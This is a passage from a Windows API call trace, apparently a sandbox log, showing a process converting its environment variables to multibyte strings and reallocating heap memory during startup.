SetLastError (dwErrCode=0x0) [0084.049] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x30 [0084.049] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x34) returned 0x741640 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0084.050] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x17) returned 0x741680 [0084.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x741680, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.050] SetLastError (dwErrCode=0x0) [0084.050] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.051] SetLastError (dwErrCode=0x0) [0084.051] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x34 [0084.052] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x38) returned 0x741640 [0084.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0084.052] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xe) returned 0x7331d8 [0084.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x7331d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.052] GetLastError () returned 0x0 [0084.052] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.053] GetLastError () returned 0x0 [0084.053] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x38 [0084.054] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x3c) returned 0x7416a0 [0084.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0084.054] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x95) returned 0x7416e8 [0084.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x7416e8, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.054] SetLastError (dwErrCode=0x0) [0084.054] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.055] SetLastError (dwErrCode=0x0) [0084.055] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.056] SetLastError (dwErrCode=0x0) [0084.056] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7416a0) returned 0x3c [0084.057] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7416a0, Size=0x40) returned 0x7416a0 [0084.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0084.057] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3e) returned 0x732550 [0084.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x732550, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.057] GetLastError () returned 0x0 [0084.057] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.058] SetLastError (dwErrCode=0x0) [0084.058] GetLastError () returned 0x0 [0084.059] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7416a0) returned 0x40 [0084.059] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7416a0, Size=0x44) returned 0x741788 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0084.059] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1b) returned 0x73eb70 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x73eb70, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0084.059] GetLastError () returned 0x0 [0084.059] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x44 [0084.059] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x48) returned 0x741788 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0084.059] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1d) returned 0x73eb98 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x73eb98, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0084.059] GetLastError () returned 0x0 [0084.059] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x48 [0084.059] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x4c) returned 0x741788 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0084.059] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x48) returned 0x736e30 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x736e30, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0084.059] GetLastError () returned 0x0 [0084.059] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x4c [0084.059] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x50) returned 0x741788 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0084.059] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x12) returned 0x741640 [0084.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x741640, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0084.059] GetLastError () returned 0x0 [0084.060] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x50 [0084.060] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x54) returned 0x741788 [0084.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0084.060] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x741660 [0084.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x741660, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0084.061] GetLastError () returned 0x0 [0084.061] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x54 [0084.061] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x58) returned 0x741788 [0084.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0084.061] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1b) returned 0x73ebc0 [0084.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x73ebc0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0084.061] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x58 [0084.061] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x5c) returned 0x741788 [0084.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0084.061] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x24) returned 0x73ad60 [0084.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x73ad60, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0084.061] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x5c [0084.061] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x60) returned 0x741788 [0084.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0084.062] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x29) returned 0x73b470 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x73b470, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0084.062] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x60 [0084.062] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x64) returned 0x741788 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0084.062] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1e) returned 0x73ebe8 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x73ebe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0084.062] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x64 [0084.062] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x68) returned 0x741788 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0084.062] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x6b) returned 0x7417f8 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x7417f8, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0084.062] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741788) returned 0x68 [0084.062] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741788, Size=0x6c) returned 0x741870 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0084.062] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x17) returned 0x7416a0 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x7416a0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0084.062] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x6c [0084.062] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x70) returned 0x741870 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0084.062] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xf) returned 0x7331f0 [0084.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x7331f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0084.062] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x70 [0084.063] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x74) returned 0x741870 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0084.063] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x16) returned 0x7416c0 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7416c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0084.063] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x74 [0084.063] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x78) returned 0x741870 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0084.063] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2a) returned 0x73b4a8 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x73b4a8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0084.063] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x78 [0084.063] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x7c) returned 0x741870 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0084.063] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x29) returned 0x73b4e0 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x73b4e0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0084.063] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x7c [0084.063] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x80) returned 0x741870 [0084.063] WideCharToMultiByte (in: CodePage=0x0, 